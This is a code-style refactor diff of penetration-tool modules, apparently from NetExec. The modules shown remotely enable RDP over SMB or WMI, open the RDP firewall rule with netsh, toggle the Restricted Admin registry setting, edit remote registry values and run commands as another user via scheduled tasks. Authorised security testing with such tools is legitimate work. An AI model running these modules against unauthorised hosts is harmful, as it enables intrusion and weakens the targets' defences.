context.log.fail(f"Enable RDP via smb error: {str(e)}")
|
context.log.fail(f"Enable RDP via smb error: {e!s}")
|
||||||
elif self.method == "wmi":
|
elif self.method == "wmi":
|
||||||
context.log.info("Executing over WMI(ncacn_ip_tcp)")
|
context.log.info("Executing over WMI(ncacn_ip_tcp)")
|
||||||
|
|
||||||
wmi_rdp = rdp_WMI(context, connection, self.dcom_timeout)
|
wmi_rdp = RdpWmi(context, connection, self.dcom_timeout)
|
||||||
|
|
||||||
if hasattr(wmi_rdp, '_rdp_WMI__iWbemLevel1Login'):
|
if hasattr(wmi_rdp, "_rdp_WMI__iWbemLevel1Login"):
|
||||||
if "ram" in self.action:
|
if "ram" in self.action:
|
||||||
# Nt version under 6 not support RAM.
|
# Nt version under 6 not support RAM.
|
||||||
try:
|
try:
|
||||||
wmi_rdp.rdp_RAMWrapper(self.action)
|
wmi_rdp.rdp_ram_wrapper(self.action)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if "WBEM_E_NOT_FOUND" in str(e):
|
if "WBEM_E_NOT_FOUND" in str(e):
|
||||||
context.log.fail("System version under NT6 not support restricted admin mode")
|
context.log.fail("System version under NT6 not support restricted admin mode")
|
||||||
else:
|
else:
|
||||||
context.log.fail(str(e))
|
context.log.fail(str(e))
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
wmi_rdp.rdp_Wrapper(self.action, self.oldSystem)
|
wmi_rdp.rdp_wrapper(self.action, self.oldSystem)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if "WBEM_E_INVALID_NAMESPACE" in str(e):
|
if "WBEM_E_INVALID_NAMESPACE" in str(e):
|
||||||
context.log.fail('Looks like target system version is under NT6, please add "OLD=true" in module options.')
|
context.log.fail("Looks like target system version is under NT6, please add 'OLD=true' in module options.")
|
||||||
else:
|
else:
|
||||||
context.log.fail(str(e))
|
context.log.fail(str(e))
|
||||||
pass
|
|
||||||
wmi_rdp._rdp_WMI__dcom.disconnect()
|
wmi_rdp._rdp_WMI__dcom.disconnect()
|
||||||
|
|
||||||
class rdp_SMB:
|
|
||||||
|
class RdpSmb:
|
||||||
def __init__(self, context, connection):
|
def __init__(self, context, connection):
|
||||||
self.context = context
|
self.context = context
|
||||||
self.__smbconnection = connection.conn
|
self.__smbconnection = connection.conn
|
||||||
self.__execute = connection.execute
|
self.__execute = connection.execute
|
||||||
self.logger = context.log
|
self.logger = context.log
|
||||||
|
|
||||||
def rdp_Wrapper(self, action):
|
def rdp_wrapper(self, action):
|
||||||
remoteOps = RemoteOperations(self.__smbconnection, False)
|
remote_ops = RemoteOperations(self.__smbconnection, False)
|
||||||
remoteOps.enableRegistry()
|
remote_ops.enableRegistry()
|
||||||
|
|
||||||
if remoteOps._RemoteOperations__rrp:
|
if remote_ops._RemoteOperations__rrp:
|
||||||
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
|
||||||
regHandle = ans["phKey"]
|
reg_handle = ans["phKey"]
|
||||||
|
|
||||||
ans = rrp.hBaseRegOpenKey(
|
ans = rrp.hBaseRegOpenKey(
|
||||||
remoteOps._RemoteOperations__rrp,
|
remote_ops._RemoteOperations__rrp,
|
||||||
regHandle,
|
reg_handle,
|
||||||
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
|
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
|
||||||
)
|
)
|
||||||
keyHandle = ans["phkResult"]
|
key_handle = ans["phkResult"]
|
||||||
|
|
||||||
ans = rrp.hBaseRegSetValue(
|
ans = rrp.hBaseRegSetValue(
|
||||||
remoteOps._RemoteOperations__rrp,
|
remote_ops._RemoteOperations__rrp,
|
||||||
keyHandle,
|
key_handle,
|
||||||
"fDenyTSConnections",
|
"fDenyTSConnections",
|
||||||
rrp.REG_DWORD,
|
rrp.REG_DWORD,
|
||||||
0 if action == "enable" else 1,
|
0 if action == "enable" else 1,
|
||||||
)
|
)
|
||||||
|
|
||||||
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "fDenyTSConnections")
|
rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "fDenyTSConnections")
|
||||||
|
|
||||||
if int(data) == 0:
|
if int(data) == 0:
|
||||||
self.logger.success("Enable RDP via SMB(ncacn_np) successfully")
|
self.logger.success("Enable RDP via SMB(ncacn_np) successfully")
|
||||||
elif int(data) == 1:
|
elif int(data) == 1:
|
||||||
self.logger.success("Disable RDP via SMB(ncacn_np) successfully")
|
self.logger.success("Disable RDP via SMB(ncacn_np) successfully")
|
||||||
|
|
||||||
self.firewall_CMD(action)
|
self.firewall_cmd(action)
|
||||||
|
|
||||||
if action == "enable":
|
if action == "enable":
|
||||||
self.query_RDPPort(remoteOps, regHandle)
|
self.query_rdp_port(remote_ops, reg_handle)
|
||||||
try:
|
with contextlib.suppress(Exception):
|
||||||
remoteOps.finish()
|
remote_ops.finish()
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
||||||
def rdp_RAMWrapper(self, action):
|
def rdp_ram_wrapper(self, action):
|
||||||
remoteOps = RemoteOperations(self.__smbconnection, False)
|
remote_ops = RemoteOperations(self.__smbconnection, False)
|
||||||
remoteOps.enableRegistry()
|
remote_ops.enableRegistry()
|
||||||
|
|
||||||
if remoteOps._RemoteOperations__rrp:
|
if remote_ops._RemoteOperations__rrp:
|
||||||
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
|
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
|
||||||
regHandle = ans["phKey"]
|
reg_handle = ans["phKey"]
|
||||||
|
|
||||||
ans = rrp.hBaseRegOpenKey(
|
ans = rrp.hBaseRegOpenKey(
|
||||||
remoteOps._RemoteOperations__rrp,
|
remote_ops._RemoteOperations__rrp,
|
||||||
regHandle,
|
reg_handle,
|
||||||
"System\\CurrentControlSet\\Control\\Lsa",
|
"System\\CurrentControlSet\\Control\\Lsa",
|
||||||
)
|
)
|
||||||
keyHandle = ans["phkResult"]
|
key_handle = ans["phkResult"]
|
||||||
|
|
||||||
rrp.hBaseRegSetValue(
|
rrp.hBaseRegSetValue(
|
||||||
remoteOps._RemoteOperations__rrp,
|
remote_ops._RemoteOperations__rrp,
|
||||||
keyHandle,
|
key_handle,
|
||||||
"DisableRestrictedAdmin",
|
"DisableRestrictedAdmin",
|
||||||
rrp.REG_DWORD,
|
rrp.REG_DWORD,
|
||||||
0 if action == "enable-ram" else 1,
|
0 if action == "enable-ram" else 1,
|
||||||
)
|
)
|
||||||
|
|
||||||
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "DisableRestrictedAdmin")
|
rtype, data = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, "DisableRestrictedAdmin")
|
||||||
|
|
||||||
if int(data) == 0:
|
if int(data) == 0:
|
||||||
self.logger.success("Enable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
|
self.logger.success("Enable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
|
||||||
elif int(data) == 1:
|
elif int(data) == 1:
|
||||||
self.logger.success("Disable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
|
self.logger.success("Disable RDP Restricted Admin Mode via SMB(ncacn_np) succeed")
|
||||||
|
|
||||||
try:
|
with contextlib.suppress(Exception):
|
||||||
remoteOps.finish()
|
remote_ops.finish()
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
||||||
def query_RDPPort(self, remoteOps, regHandle):
|
def query_rdp_port(self, remoteOps, regHandle):
|
||||||
if remoteOps:
|
if remoteOps:
|
||||||
ans = rrp.hBaseRegOpenKey(
|
ans = rrp.hBaseRegOpenKey(
|
||||||
remoteOps._RemoteOperations__rrp,
|
remoteOps._RemoteOperations__rrp,
|
||||||
regHandle,
|
regHandle,
|
||||||
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
|
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
|
||||||
)
|
)
|
||||||
keyHandle = ans["phkResult"]
|
key_handle = ans["phkResult"]
|
||||||
|
|
||||||
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, "PortNumber")
|
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, key_handle, "PortNumber")
|
||||||
|
|
||||||
self.logger.success(f"RDP Port: {str(data)}")
|
self.logger.success(f"RDP Port: {data!s}")
|
||||||
|
|
||||||
# https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_rdp.rb
|
# https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/enable_rdp.rb
|
||||||
def firewall_CMD(self, action):
|
def firewall_cmd(self, action):
|
||||||
cmd = f"netsh firewall set service type = remotedesktop mode = {action}"
|
cmd = f"netsh firewall set service type = remotedesktop mode = {action}"
|
||||||
self.logger.info("Configure firewall via execute command.")
|
self.logger.info("Configure firewall via execute command.")
|
||||||
output = self.__execute(cmd, True)
|
output = self.__execute(cmd, True)
|
||||||
|
@ -211,20 +204,21 @@ class rdp_SMB:
|
||||||
else:
|
else:
|
||||||
self.logger.fail(f"{action.capitalize()} RDP firewall rules via cmd failed, maybe got detected by AV software.")
|
self.logger.fail(f"{action.capitalize()} RDP firewall rules via cmd failed, maybe got detected by AV software.")
|
||||||
|
|
||||||
class rdp_WMI:
|
|
||||||
|
class RdpWmi:
|
||||||
def __init__(self, context, connection, timeout):
|
def __init__(self, context, connection, timeout):
|
||||||
self.logger = context.log
|
self.logger = context.log
|
||||||
self.__currentprotocol = context.protocol
|
self.__currentprotocol = context.protocol
|
||||||
# From dfscoerce.py
|
# From dfscoerce.py
|
||||||
self.__username=connection.username
|
self.__username = connection.username
|
||||||
self.__password=connection.password
|
self.__password = connection.password
|
||||||
self.__domain=connection.domain
|
self.__domain = connection.domain
|
||||||
self.__lmhash=connection.lmhash
|
self.__lmhash = connection.lmhash
|
||||||
self.__nthash=connection.nthash
|
self.__nthash = connection.nthash
|
||||||
self.__target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
|
self.__target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain
|
||||||
self.__doKerberos=connection.kerberos
|
self.__doKerberos = connection.kerberos
|
||||||
self.__kdcHost=connection.kdcHost
|
self.__kdcHost = connection.kdcHost
|
||||||
self.__aesKey=connection.aesKey
|
self.__aesKey = connection.aesKey
|
||||||
self.__timeout = timeout
|
self.__timeout = timeout
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -241,102 +235,102 @@ class rdp_WMI:
|
||||||
kdcHost=self.__kdcHost,
|
kdcHost=self.__kdcHost,
|
||||||
)
|
)
|
||||||
|
|
||||||
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
i_interface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
||||||
if self.__currentprotocol == "smb":
|
if self.__currentprotocol == "smb":
|
||||||
flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)
|
flag, self.__stringBinding = dcom_FirewallChecker(i_interface, self.__timeout)
|
||||||
if not flag or not self.__stringBinding:
|
if not flag or not self.__stringBinding:
|
||||||
error_msg = f'RDP-WMI: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the module option "DCOM-TIMEOUT=10". If it\'s still failing maybe something is blocking the RPC connection, please try to use "-o" with "METHOD=smb"'
|
error_msg = f'RDP-WMI: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the module option "DCOM-TIMEOUT=10". If it\'s still failing maybe something is blocking the RPC connection, please try to use "-o" with "METHOD=smb"'
|
||||||
|
|
||||||
if not self.__stringBinding:
|
if not self.__stringBinding:
|
||||||
error_msg = "RDP-WMI: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
|
error_msg = "RDP-WMI: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
|
||||||
|
|
||||||
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
|
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
|
||||||
# Make it force break function
|
# Make it force break function
|
||||||
self.__dcom.disconnect()
|
self.__dcom.disconnect()
|
||||||
self.__iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
|
self.__iWbemLevel1Login = wmi.IWbemLevel1Login(i_interface)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f'Unexpected wmi error: {str(e)}, please try to use "-o" with "METHOD=smb"')
|
self.logger.fail(f'Unexpected wmi error: {e}, please try to use "-o" with "METHOD=smb"')
|
||||||
if self.__iWbemLevel1Login in locals():
|
if self.__iWbemLevel1Login in locals():
|
||||||
self.__dcom.disconnect()
|
self.__dcom.disconnect()
|
||||||
|
|
||||||
def rdp_Wrapper(self, action, old=False):
|
def rdp_wrapper(self, action, old=False):
|
||||||
if old == False:
|
if old is False:
|
||||||
# According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting
|
# According to this document: https://learn.microsoft.com/en-us/windows/win32/termserv/win32-tslogonsetting
|
||||||
# Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices"
|
# Authentication level must set to RPC_C_AUTHN_LEVEL_PKT_PRIVACY when accessing namespace "//./root/cimv2/TerminalServices"
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2/TerminalServices", NULL, NULL)
|
||||||
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
i_wbem_services.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
if action == 'enable':
|
if action == "enable":
|
||||||
self.logger.info("Enabled RDP services and setting up firewall.")
|
self.logger.info("Enabled RDP services and setting up firewall.")
|
||||||
iWbemClassObject.SetAllowTSConnections(1,1)
|
i_wbem_class_object.SetAllowTSConnections(1, 1)
|
||||||
elif action == 'disable':
|
elif action == "disable":
|
||||||
self.logger.info("Disabled RDP services and setting up firewall.")
|
self.logger.info("Disabled RDP services and setting up firewall.")
|
||||||
iWbemClassObject.SetAllowTSConnections(0,0)
|
i_wbem_class_object.SetAllowTSConnections(0, 0)
|
||||||
else:
|
else:
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
if action == 'enable':
|
if action == "enable":
|
||||||
self.logger.info("Enabling RDP services (old system not support setting up firewall)")
|
self.logger.info("Enabling RDP services (old system not support setting up firewall)")
|
||||||
iWbemClassObject.SetAllowTSConnections(1)
|
i_wbem_class_object.SetAllowTSConnections(1)
|
||||||
elif action == 'disable':
|
elif action == "disable":
|
||||||
self.logger.info("Disabling RDP services (old system not support setting up firewall)")
|
self.logger.info("Disabling RDP services (old system not support setting up firewall)")
|
||||||
iWbemClassObject.SetAllowTSConnections(0)
|
i_wbem_class_object.SetAllowTSConnections(0)
|
||||||
|
|
||||||
self.query_RDPResult(old)
|
|
||||||
|
|
||||||
if action == 'enable':
|
self.query_rdp_result(old)
|
||||||
self.query_RDPPort()
|
|
||||||
|
if action == "enable":
|
||||||
|
self.query_rdp_port()
|
||||||
# Need to create new iWbemServices interface in order to flush results
|
# Need to create new iWbemServices interface in order to flush results
|
||||||
|
|
||||||
def query_RDPResult(self, old=False):
|
def query_rdp_result(self, old=False):
|
||||||
if old == False:
|
if old is False:
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2/TerminalServices', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2/TerminalServices", NULL, NULL)
|
||||||
iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
i_wbem_services.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
result = dict(iWbemClassObject.getProperties())
|
result = dict(i_wbem_class_object.getProperties())
|
||||||
result = result['AllowTSConnections']['value']
|
result = result["AllowTSConnections"]["value"]
|
||||||
if result == 0:
|
if result == 0:
|
||||||
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully")
|
||||||
else:
|
else:
|
||||||
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully")
|
||||||
else:
|
else:
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
result = dict(iWbemClassObject.getProperties())
|
result = dict(i_wbem_class_object.getProperties())
|
||||||
result = result['AllowTSConnections']['value']
|
result = result["AllowTSConnections"]["value"]
|
||||||
if result == 0:
|
if result == 0:
|
||||||
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
||||||
else:
|
else:
|
||||||
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
||||||
|
|
||||||
def query_RDPPort(self):
|
def query_rdp_port(self):
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/DEFAULT', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/DEFAULT", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
|
std_reg_prov, resp = i_wbem_services.GetObject("StdRegProv")
|
||||||
out = StdRegProv.GetDWORDValue(2147483650, 'SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp', 'PortNumber')
|
out = std_reg_prov.GetDWORDValue(2147483650, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", "PortNumber")
|
||||||
self.logger.success(f"RDP Port: {str(out.uValue)}")
|
self.logger.success(f"RDP Port: {out.uValue!s}")
|
||||||
|
|
||||||
# Nt version under 6 not support RAM.
|
# Nt version under 6 not support RAM.
|
||||||
def rdp_RAMWrapper(self, action):
|
def rdp_ram_wrapper(self, action):
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
|
std_reg_prov, resp = i_wbem_services.GetObject("StdRegProv")
|
||||||
if action == 'enable-ram':
|
if action == "enable-ram":
|
||||||
self.logger.info("Enabling Restricted Admin Mode.")
|
self.logger.info("Enabling Restricted Admin Mode.")
|
||||||
StdRegProv.SetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin', 0)
|
std_reg_prov.SetDWORDValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa", "DisableRestrictedAdmin", 0)
|
||||||
elif action == 'disable-ram':
|
elif action == "disable-ram":
|
||||||
self.logger.info("Disabling Restricted Admin Mode (Clear).")
|
self.logger.info("Disabling Restricted Admin Mode (Clear).")
|
||||||
StdRegProv.DeleteValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
|
std_reg_prov.DeleteValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa", "DisableRestrictedAdmin")
|
||||||
out = StdRegProv.GetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
|
out = std_reg_prov.GetDWORDValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa", "DisableRestrictedAdmin")
|
||||||
if out.uValue == 0:
|
if out.uValue == 0:
|
||||||
self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
||||||
elif out.uValue == None:
|
elif out.uValue is None:
|
||||||
self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
from impacket.dcerpc.v5 import rrp
|
from impacket.dcerpc.v5 import rrp
|
||||||
from impacket.examples.secretsdump import RemoteOperations
|
from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
@ -63,8 +60,8 @@ class NXCModule:
|
||||||
if "WORD" in self.type:
|
if "WORD" in self.type:
|
||||||
try:
|
try:
|
||||||
self.value = int(self.value)
|
self.value = int(self.value)
|
||||||
except:
|
except Exception as e:
|
||||||
context.log.fail(f"Invalid registry value type specified: {self.value}")
|
context.log.fail(f"Invalid registry value type specified: {self.value}: {e}")
|
||||||
return
|
return
|
||||||
if self.type in type_dict:
|
if self.type in type_dict:
|
||||||
self.type = type_dict[self.type]
|
self.type = type_dict[self.type]
|
||||||
|
@ -112,8 +109,8 @@ class NXCModule:
|
||||||
try:
|
try:
|
||||||
# Check if value exists
|
# Check if value exists
|
||||||
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
|
||||||
except:
|
except Exception as e:
|
||||||
self.context.log.fail(f"Registry key {self.key} does not exist")
|
self.context.log.fail(f"Registry key {self.key} does not exist: {e}")
|
||||||
return
|
return
|
||||||
# Delete value
|
# Delete value
|
||||||
rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
|
rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
|
||||||
|
@ -135,7 +132,7 @@ class NXCModule:
|
||||||
self.value,
|
self.value,
|
||||||
)
|
)
|
||||||
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
|
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
|
||||||
except:
|
except Exception:
|
||||||
rrp.hBaseRegSetValue(
|
rrp.hBaseRegSetValue(
|
||||||
remote_ops._RemoteOperations__rrp,
|
remote_ops._RemoteOperations__rrp,
|
||||||
key_handle,
|
key_handle,
|
||||||
|
@ -150,7 +147,7 @@ class NXCModule:
|
||||||
try:
|
try:
|
||||||
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
|
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
|
||||||
self.context.log.highlight(f"{self.key}: {reg_value}")
|
self.context.log.highlight(f"{self.key}: {reg_value}")
|
||||||
except:
|
except Exception:
|
||||||
if self.delete:
|
if self.delete:
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
name = "runasppl"
|
name = "runasppl"
|
||||||
|
@ -17,10 +14,10 @@ class NXCModule:
|
||||||
""""""
|
""""""
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
command = "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
|
command = r"reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
|
||||||
context.log.display("Executing command")
|
context.log.debug(f"Executing command: {command}")
|
||||||
p = connection.execute(command, True)
|
p = connection.execute(command, True)
|
||||||
if "The system was unable to find the specified registry key or value" in p:
|
if "The system was unable to find the specified registry key or value" in p:
|
||||||
context.log.debug(f"Unable to find RunAsPPL Registry Key")
|
context.log.debug("Unable to find RunAsPPL Registry Key")
|
||||||
else:
|
else:
|
||||||
context.log.highlight(p)
|
context.log.highlight(p)
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import os
|
import os
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
|
@ -21,7 +18,6 @@ class NXCModule:
|
||||||
CMD Command to execute
|
CMD Command to execute
|
||||||
USER User to execute command as
|
USER User to execute command as
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.cmd = self.user = self.time = None
|
self.cmd = self.user = self.time = None
|
||||||
if "CMD" in module_options:
|
if "CMD" in module_options:
|
||||||
self.cmd = module_options["CMD"]
|
self.cmd = module_options["CMD"]
|
||||||
|
@ -60,7 +56,7 @@ class NXCModule:
|
||||||
connection.hash,
|
connection.hash,
|
||||||
self.logger,
|
self.logger,
|
||||||
connection.args.get_output_tries,
|
connection.args.get_output_tries,
|
||||||
"C$" # This one shouldn't be hardcoded but I don't know where to retrive the info
|
"C$", # This one shouldn't be hardcoded but I don't know where to retrieve the info
|
||||||
)
|
)
|
||||||
|
|
||||||
self.logger.display(f"Executing {self.cmd} as {self.user}")
|
self.logger.display(f"Executing {self.cmd} as {self.user}")
|
||||||
|
@ -70,7 +66,7 @@ class NXCModule:
|
||||||
if not isinstance(output, str):
|
if not isinstance(output, str):
|
||||||
output = output.decode(connection.args.codec)
|
output = output.decode(connection.args.codec)
|
||||||
except UnicodeDecodeError:
|
except UnicodeDecodeError:
|
||||||
# Required to decode specific french caracters otherwise it'll print b"<result>"
|
# Required to decode specific French characters otherwise it'll print b"<result>"
|
||||||
output = output.decode("cp437")
|
output = output.decode("cp437")
|
||||||
if output:
|
if output:
|
||||||
self.logger.highlight(output)
|
self.logger.highlight(output)
|
||||||
|
@ -256,10 +252,10 @@ class TSCH_EXEC:
|
||||||
if fileless:
|
if fileless:
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
with open(os.path.join("/tmp", "nxc_hosted", self.__output_filename), "r") as output:
|
with open(os.path.join("/tmp", "nxc_hosted", self.__output_filename)) as output:
|
||||||
self.output_callback(output.read())
|
self.output_callback(output.read())
|
||||||
break
|
break
|
||||||
except IOError:
|
except OSError:
|
||||||
sleep(2)
|
sleep(2)
|
||||||
else:
|
else:
|
||||||
smbConnection = self.__rpctransport.get_smb_connection()
|
smbConnection = self.__rpctransport.get_smb_connection()
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
